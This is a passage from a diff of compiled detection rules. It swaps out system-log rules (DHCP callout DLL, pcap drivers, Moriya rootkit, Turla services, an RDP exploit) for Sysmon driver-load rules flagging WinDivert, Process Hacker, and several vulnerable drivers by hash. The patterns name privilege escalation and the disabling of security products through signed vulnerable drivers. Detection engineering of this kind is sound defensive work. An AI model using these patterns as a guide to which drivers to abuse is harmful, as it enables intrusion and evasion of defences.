'%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594')))" ], - "filename": "win_system_volume_shadow_copy_mount.yml" + "filename": "driver_load_win_vuln_hevd_driver.yml" }, { - "title": "DHCP Server Loaded the CallOut DLL", - "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", - "status": "test", - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "author": "Dimitrios Slamaris", + "title": "WinDivert Driver Load", + "id": "679085d5-f427-4484-9f58-1dc30a7c426d", + "status": "experimental", + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.collection", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1599.001", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate WinDivert driver usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9')))" ], - "filename": "win_system_susp_dhcp_config.yml" + "filename": "driver_load_win_windivert.yml" }, { - "title": "Windows Pcap Drivers", - "id": "7b687634-ab20-11ea-bb37-0242ac130002", - "status": "test", - "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", - "author": "Cian Heasley", + "title": "Vulnerable Lenovo Driver Load", + "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "status": "experimental", + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate driver loads (old driver that didn't receive an update)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '4697' AND (ServiceFileName LIKE '%pcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npf%' ESCAPE '\\' OR ServiceFileName LIKE '%nm3%' ESCAPE '\\' OR ServiceFileName LIKE '%ndiscap%' ESCAPE '\\' OR ServiceFileName LIKE '%nmnt%' ESCAPE '\\' OR ServiceFileName LIKE '%windivert%' ESCAPE '\\' OR ServiceFileName LIKE '%USBPcap%' ESCAPE '\\' OR ServiceFileName LIKE '%pktmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f'))" ], - "filename": "win_system_pcap_drivers.yml" + "filename": "driver_load_win_vuln_lenovo_driver.yml" }, { - "title": "Moriya Rootkit - System", - "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "title": "Vulnerable AVAST Anti Rootkit Driver Load", + "id": "7c676970-af4f-43c8-80af-ec9b49952852", "status": "experimental", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", "attack.privilege_escalation", "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired'))))" ], - "filename": "win_system_moriya_rootkit.yml" + "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" }, { - "title": "Turla Service Install", - "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", - "status": "test", - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "title": "Process Hacker and System Informer Driver Load", + "id": "67add051-9ee7-4ad3-93ba-42935615ae8d", + "status": "experimental", + "description": "Detects the load of drivers used by Process Hacker and System Informer", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate user of process hacker or system informer by low level developers or system administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemInformer.sys' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=821D74031D3F625BCBD0DF08B70F1E77%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F86759BB4DE4320918615DC06E998A39%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A64EEB85419257D0CE32BD5D55C3A18%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6E7B34DFC017700B1517B230DF6FF0D0%' ESCAPE '\\') OR Imphash IN ('821D74031D3F625BCBD0DF08B70F1E77', 'F86759BB4DE4320918615DC06E998A39', '0A64EEB85419257D0CE32BD5D55C3A18', '6E7B34DFC017700B1517B230DF6FF0D0') OR (Hashes LIKE '%SHA256=8B9AD98944AC9886EA4CB07700E71B78BE4A2740934BB7E46CA3B56A7C59AD24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A41348BEC147CA4D9EA2869817527EB5CEA2E20202AF599D2B30625433BCF454%' ESCAPE '\\' OR Hashes LIKE '%SHA256=38EE0A88AF8535A11EFE8D8DA9C6812AA07067B75A64D99705A742589BDD846D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A773891ACF203A7EB0C0D30942FB1347648F1CD918AE2BFD9A4857B4DCF5081B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4C3B81AC88A987BBDF7D41FA0AECC2CEDF5B9BD2F45E7A21F376D05345FC211D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3241BC14BEC51CE6A691B9A3562E5C1D52E9D057D27A3D67FD0B245C350B6D34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=047C42E9BBA28366868847C7DAFC1E043FB038C796422D37220493517D68EE89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=18931DC81E95D0020466FA091E16869DBE824E543A4C2C8FE644FA71A0F44FEB%' ESCAPE '\\' OR Hashes LIKE '%SHA256=B4C2EF76C204273132FDE38F0DED641C2C5EE767652E64E4C4071A4A973B6C1B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=640954AFC268565F7DAA6E6F81A8EE05311E33E34332B501A3C3FE5B22ADEA97%' ESCAPE '\\' OR Hashes LIKE '%SHA256=251BE949F662C838718F8AA0A5F8211FB90346D02BD63FF91E6B224E0E01B656%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E2606F272F7BA054DF16BE464FDA57211EF0D14A0D959F9C8DCB0575DF1186E4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3A9E1D17BEEB514F1B9B3BACAEE7420285DE5CBDCE89C5319A992C6CBD1DE138%' ESCAPE '\\') OR sha256 IN ('8b9ad98944ac9886ea4cb07700e71b78be4a2740934bb7e46ca3b56a7c59ad24', 'a41348bec147ca4d9ea2869817527eb5cea2e20202af599d2b30625433bcf454', '38ee0a88af8535a11efe8d8da9c6812aa07067b75a64d99705a742589bdd846d', 'a773891acf203a7eb0c0d30942fb1347648f1cd918ae2bfd9a4857b4dcf5081b', '4c3b81ac88a987bbdf7d41fa0aecc2cedf5b9bd2f45e7a21f376d05345fc211d', '3241bc14bec51ce6a691b9a3562e5c1d52e9d057d27a3d67fd0b245c350b6d34', '047c42e9bba28366868847c7dafc1e043fb038c796422d37220493517d68ee89', '18931dc81e95d0020466fa091e16869dbe824e543a4c2c8fe644fa71a0f44feb', 'b4c2ef76c204273132fde38f0ded641c2c5ee767652e64e4c4071a4a973b6c1b', '640954afc268565f7daa6e6f81a8ee05311e33e34332b501a3c3fe5b22adea97', '251be949f662c838718f8aa0a5f8211fb90346d02bd63ff91e6b224e0e01b656', 'e2606f272f7ba054df16be464fda57211ef0d14a0d959f9c8dcb0575df1186e4', '3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138')))" ], - "filename": "win_system_apt_carbonpaper_turla.yml" + "filename": "driver_load_win_process_hacker.yml" }, { - "title": "Potential RDP Exploit CVE-2019-0708", - "id": "aaa5b30d-f418-420b-83a0-299cb6024885", - "status": "test", - "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", - "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", + "title": "Vulnerable Driver Load", + "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "status": "experimental", + "description": "Detects the load of known vulnerable drivers by hash value", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ - "Bad connections or network interruptions" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('56', '50') AND Provider_Name = 'TermDD')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=1b5c3c458e31bede55145d0644e88d75%' ESCAPE '\\' OR Hashes LIKE '%MD5=6f5d54ab483659ac78672440422ae3f1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=c02f70960fa934b8defa16a03d7f6556%' ESCAPE '\\' OR Hashes LIKE '%MD5=839cbbc86453960e9eb6db814b776a40%' ESCAPE '\\' OR Hashes LIKE '%MD5=acac842a46f3501fe407b1db1b247a0b%' ESCAPE '\\' OR Hashes LIKE '%MD5=95e4c7b0384da89dce8ea6f31c3613d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=e700a820f117f65e813b216fccbf78c9%' ESCAPE '\\' OR Hashes LIKE '%MD5=96b463b6fa426ae42c414177af550ba2%' ESCAPE '\\' OR Hashes LIKE '%MD5=27bcbeec8a466178a6057b64bef66512%' ESCAPE '\\' OR Hashes LIKE '%MD5=70dcd07d38017b43f710061f37cb4a91%' ESCAPE '\\' OR Hashes LIKE '%MD5=db72def618cbc3c5f9aa82f091b54250%' ESCAPE '\\' OR Hashes LIKE '%MD5=83601bbe5563d92c1fdb4e960d84dc77%' ESCAPE '\\' OR Hashes LIKE '%MD5=5970e8de1b337ca665114511b9d10806%' ESCAPE '\\' OR Hashes LIKE '%MD5=49fe3d1f3d5c2e50a0df0f6e8436d778%' ESCAPE '\\' OR Hashes LIKE '%MD5=1493d342e7a36553c56b2adea150949e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f191abc652d8f7442ca2636725e1ed6%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ae30291c6cbfa7be39320badd6e8de0%' ESCAPE '\\' OR Hashes LIKE '%MD5=d104621c93213942b7b43d65b5d8d33e%' ESCAPE '\\' OR Hashes LIKE '%MD5=b89b097b8b8aecb8341d05136f334ebb%' ESCAPE '\\' OR Hashes LIKE '%MD5=14580bd59c55185115fd3abe73b016a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=992ded5b623be3c228f32edb4ca3f2d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=a26e600652c33dd054731b4693bf5b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f950cfd5ed8dd9de3de004f5416fe20%' ESCAPE '\\' OR Hashes LIKE '%MD5=491aec2249ad8e2020f9f9b559ab68a8%' ESCAPE '\\' OR Hashes LIKE '%MD5=e4266262a77fffdea2584283f6c4f51d%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd25be845c151370ff177509d95d5add%' ESCAPE '\\' OR Hashes LIKE '%MD5=9638f265b1ddd5da6ecdf5c0619dcbe6%' ESCAPE '\\' OR Hashes LIKE '%MD5=4e90cd77509738d30d3181a4d0880bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=0a6a1c9a7f80a2a5dcced5c4c0473765%' ESCAPE '\\' OR Hashes LIKE '%MD5=9aa7ed7809eec0d8bc6c545a1d18107a%' ESCAPE '\\' OR Hashes LIKE '%MD5=aa1ed3917928f04d97d8a217fe9b5cb1%' ESCAPE '\\' OR Hashes LIKE '%MD5=42f7cc4be348c3efd98b0f1233cf2d69%' ESCAPE '\\' OR Hashes LIKE '%MD5=4cc3ddd5ae268d9a154a426af2c23ef9%' ESCAPE '\\' OR Hashes LIKE '%MD5=2fed983ec44d1e7cffb0d516407746f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7cbbb5eb263ec9a35a1042f52e82ca4%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed6348707f177629739df73b97ba1b6e%' ESCAPE '\\' OR Hashes LIKE '%MD5=40bc58b7615d00eb55ad9ba700c340c1%' ESCAPE '\\' OR Hashes LIKE '%MD5=c3fea895fe95ea7a57d9f4d7abed5e71%' ESCAPE '\\' OR Hashes LIKE '%MD5=2128e6c044ee86f822d952a261af0b48%' ESCAPE '\\' OR Hashes LIKE '%MD5=3dbf69f935ea48571ea6b0f5a2878896%' ESCAPE '\\' OR Hashes LIKE '%MD5=c6f8983dd3d75640c072a8459b8fa55a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=79f7e6f98a5d3ab6601622be4471027f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bae1f127c4ff21d8fe45e2bbfc59c180%' ESCAPE '\\' OR Hashes LIKE '%MD5=c533d6d64b474ffc3169a0e0fc0a701a%' ESCAPE '\\' OR Hashes LIKE '%MD5=3f39f013168428c8e505a7b9e6cba8a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=748cf64b95ca83abc35762ad2c25458f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bce7f34912ff59a3926216b206deb09f%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d8e4f38b36c334d0a32a7324832501d%' ESCAPE '\\' OR Hashes LIKE '%MD5=47e6ac52431ca47da17248d80bf71389%' ESCAPE '\\' OR Hashes LIKE '%MD5=3651a6990fe38711ebb285143f867a43%' ESCAPE '\\' OR Hashes LIKE '%MD5=dc943bf367ae77016ae399df8e71d38a%' ESCAPE '\\' OR Hashes LIKE '%MD5=02198692732722681f246c1b33f7a9d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=ddc2ffe0ab3fcd48db898ab13c38d88d%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ec361f2fba49c73260af351c39ff9cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1fce7aac4e9dd7a730997e2979fa1e2%' ESCAPE '\\' OR Hashes LIKE '%MD5=49938383844ceec33dba794fb751c9a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=34069a15ae3aa0e879cd0d81708e4bcc%' ESCAPE '\\' OR Hashes LIKE '%MD5=1c294146fc77565030603878fd0106f9%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd81af62964f5dd5eb4a828543a33dcf%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd5b0514f3b40f139d8079138d01b5f6%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa173832dca1b1faeba095e5c82a1559%' ESCAPE '\\' OR Hashes LIKE '%MD5=5cc5c26fc99175997d84fe95c61ab2c2%' ESCAPE '\\' OR Hashes LIKE '%MD5=1ed043249c21ab201edccb37f1d40af9%' ESCAPE '\\' OR Hashes LIKE '%MD5=361a598d8bb92c13b18abb7cac850b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b359b722ac80c4e0a5235264e1e0156%' ESCAPE '\\' OR Hashes LIKE '%MD5=296bde4d0ed32c6069eb90c502187d0d%' ESCAPE '\\' OR Hashes LIKE '%MD5=d3e40644a91327da2b1a7241606fe559%' ESCAPE '\\' OR Hashes LIKE '%MD5=12cecc3c14160f32b21279c1a36b8338%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd39a86852b498b891672ffbcd071c03%' ESCAPE '\\' OR Hashes LIKE '%MD5=b2a9ac0600b12ec9819e049d7a6a0b75%' ESCAPE '\\' OR Hashes LIKE '%MD5=444f538daa9f7b340cfd43974ed43690%' ESCAPE '\\' OR Hashes LIKE '%MD5=7b43dfd84de5e81162ebcfafb764b769%' ESCAPE '\\' OR Hashes LIKE '%MD5=13dda15ef67eb265869fc371c72d6ef0%' ESCAPE '\\' OR Hashes LIKE '%MD5=300c5b1795c9b6cc1bc4d7d55c7bbe85%' ESCAPE '\\' OR Hashes LIKE '%MD5=1392b92179b07b672720763d9b1028a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=2e1f8a2a80221deb93496a861693c565%' ESCAPE '\\' OR Hashes LIKE '%MD5=8065a7659562005127673ac52898675f%' ESCAPE '\\' OR Hashes LIKE '%MD5=b5ada7fd226d20ec6634fc24768f9e22%' ESCAPE '\\' OR Hashes LIKE '%MD5=84fb76ee319073e77fb364bbbbff5461%' ESCAPE '\\' OR Hashes LIKE '%MD5=daf800da15b33bf1a84ee7afc59f0656%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7393fb917aed182e4cbef25ce8af950%' ESCAPE '\\' OR Hashes LIKE '%MD5=120b5bbb9d2eb35ff4f62d79507ea63a%' ESCAPE '\\' OR Hashes LIKE '%MD5=73c98438ac64a68e88b7b0afd11ba140%' ESCAPE '\\' OR Hashes LIKE '%MD5=51207adb8dab983332d6b22c29fe8129%' ESCAPE '\\' OR Hashes LIKE '%MD5=4a23e0f2c6f926a41b28d574cbc6ac30%' ESCAPE '\\' OR Hashes LIKE '%MD5=20125794b807116617d43f02b616e092%' ESCAPE '\\' OR Hashes LIKE '%MD5=e8ebba56ea799e1e62748c59e1a4c586%' ESCAPE '\\' OR Hashes LIKE '%MD5=8abbb12e61045984eda19e2dc77b235e%' ESCAPE '\\' OR Hashes LIKE '%MD5=f66b96aa7ae430b56289409241645099%' ESCAPE '\\' OR Hashes LIKE '%MD5=97e3a44ec4ae58c8cc38eefc613e950e%' ESCAPE '\\' OR Hashes LIKE '%MD5=ff7b31fa6e9ab923bce8af31d1be5bb2%' ESCAPE '\\' OR Hashes LIKE '%MD5=12908c285b9d68ee1f39186110df0f1e%' ESCAPE '\\' OR Hashes LIKE '%MD5=6126065af2fc2639473d12ee3c0c198e%' ESCAPE '\\' OR Hashes LIKE '%MD5=356bda2bf0f6899a2c08b2da3ec69f13%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd7de498a72b2daf89f321d23948c3c4%' ESCAPE '\\' OR Hashes LIKE '%MD5=338a98e1c27bc76f09331fcd7ae413a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=c9a293762319d73c8ee84bcaaf81b7b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=e9e786bdba458b8b4f9e93d034f73d00%' ESCAPE '\\' OR Hashes LIKE '%MD5=a17c58c0582ee560c72f60764ed63224%' ESCAPE '\\' OR Hashes LIKE '%MD5=21e13f2cb269defeae5e1d09887d47bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=a57b47489febc552515778dd0fd1e51c%' ESCAPE '\\' OR Hashes LIKE '%MD5=d6e9f6c67d9b3d790d592557a7d57c3c%' ESCAPE '\\' OR Hashes LIKE '%MD5=76bb1a4332666222a8e3e1339e267179%' ESCAPE '\\' OR Hashes LIKE '%MD5=1cd158a64f3d886357535382a6fdad75%' ESCAPE '\\' OR Hashes LIKE '%MD5=d9e7e5bcc5b01915dbcef7762a7fc329%' ESCAPE '\\' OR Hashes LIKE '%MD5=d253c19194a18030296ae62a10821640%' ESCAPE '\\' OR Hashes LIKE '%MD5=b12d1630fd50b2a21fd91e45d522ba3a%' ESCAPE '\\' OR Hashes LIKE '%MD5=50b39072d0ee9af5ef4824eca34be6e3%' ESCAPE '\\' OR Hashes LIKE '%MD5=778b7feea3c750d44745d3bf294bd4ce%' ESCAPE '\\' OR Hashes LIKE '%MD5=0761c357aed5f591142edaefdf0c89c8%' ESCAPE '\\' OR Hashes LIKE '%MD5=23cf3da010497eb2bf39a5c5a57e437c%' ESCAPE '\\' OR Hashes LIKE '%MD5=c49a1956a6a25ffc25ad97d6762b0989%' ESCAPE '\\' OR Hashes LIKE '%MD5=f406c5536bcf9bacbeb7ce8a3c383bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=f2f728d2f69765f5dfda913d407783d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=4b817d0e7714b9d43db43ae4a22a161e%' ESCAPE '\\' OR Hashes LIKE '%MD5=715f8efab1d1c660e4188055c4b28eed%' ESCAPE '\\' OR Hashes LIKE '%MD5=a01c412699b6f21645b2885c2bae4454%' ESCAPE '\\' OR Hashes LIKE '%MD5=010c0e5ac584e3ab97a2daf84cf436f5%' ESCAPE '\\' OR Hashes LIKE '%MD5=d5db81974ffda566fa821400419f59be%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014ba35d406475311a2eab0c4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d487f77be4471900d6ccbc47242cc25%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f2888e57fdd6aee466962c25ba7d62d%' ESCAPE '\\' OR Hashes LIKE '%MD5=507a649eb585d8d0447eab0532ef0c73%' ESCAPE '\\' OR Hashes LIKE '%MD5=4ad8fd9e83d7200bd7f8d0d4a9abfb11%' ESCAPE '\\' OR Hashes LIKE '%MD5=cd9f0fcecf1664facb3671c0130dc8bb%' ESCAPE '\\' OR Hashes LIKE '%MD5=b10b210c5944965d0dc85e70a0b19a42%' ESCAPE '\\' OR Hashes LIKE '%MD5=ae5eb2759305402821aeddc52ba9a6d6%' ESCAPE '\\' OR Hashes LIKE '%MD5=f5051c756035ef5de9c4c48bacb0612b%' ESCAPE '\\' OR Hashes LIKE '%MD5=1898ceda3247213c084f43637ef163b3%' ESCAPE '\\' OR Hashes LIKE '%MD5=37086ae5244442ba552803984a11d6cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=825703c494e0d270f797f1ecf070f698%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\' OR Hashes LIKE '%MD5=75d6c3469347de1cdfa3b1b9f1544208%' ESCAPE '\\' OR Hashes LIKE '%MD5=9ab9f3b75a2eb87fafb1b7361be9dfb3%' ESCAPE '\\' OR Hashes LIKE '%MD5=5f9785e7535f8f602cb294a54962c9e7%' ESCAPE '\\' OR Hashes LIKE '%MD5=7d46d0ddaf8c7e1776a70c220bf47524%' ESCAPE '\\' OR Hashes LIKE '%MD5=f9844524fb0009e5b784c21c7bad4220%' ESCAPE '\\' OR Hashes LIKE '%MD5=828bb9cb1dd449cd65a29b18ec46055f%' ESCAPE '\\' OR Hashes LIKE '%MD5=4d17b32be70ef39eae5d5edeb5e89877%' ESCAPE '\\' OR Hashes LIKE '%MD5=2391fb461b061d0e5fccb050d4af7941%' ESCAPE '\\' OR Hashes LIKE '%MD5=6d4159694e1754f262e326b52a3b305a%' ESCAPE '\\' OR Hashes LIKE '%MD5=a60c9173563b940203cf4ad38ccf2082%' ESCAPE '\\' OR Hashes LIKE '%MD5=63e333d64a8716e1ae59f914cb686ae8%' ESCAPE '\\' OR Hashes LIKE '%MD5=a9f220b1507a3c9a327a99995ff99c82%' ESCAPE '\\' OR Hashes LIKE '%MD5=c5f5d109f11aadebae94c77b27cb026f%' ESCAPE '\\' OR Hashes LIKE '%MD5=5bab40019419a2713298a5c9173e5d30%' ESCAPE '\\' OR Hashes LIKE '%MD5=c996d7971c49252c582171d9380360f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=98763a3dee3cf03de334f00f95fc071a%' ESCAPE '\\' OR Hashes LIKE '%MD5=e79c91c27df3eaf82fb7bd1280172517%' ESCAPE '\\' OR Hashes LIKE '%MD5=a42249a046182aaaf3a7a7db98bfa69d%' ESCAPE '\\' OR Hashes LIKE '%MD5=803a371a78d528a44ef8777f67443b16%' ESCAPE '\\' OR Hashes LIKE '%MD5=9007c94c9d91ccff8d7f5d4cdddcc403%' ESCAPE '\\' OR Hashes LIKE '%MD5=11fb599312cb1cf43ca5e879ed6fb71e%' ESCAPE '\\' OR Hashes LIKE '%MD5=7f9309f5e4defec132b622fadbcad511%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=8636fe3724f2bcba9399daffd6ef3c7e%' ESCAPE '\\' OR Hashes LIKE '%MD5=9dfd73dadb2f1c7e9c9d2542981aaa63%' 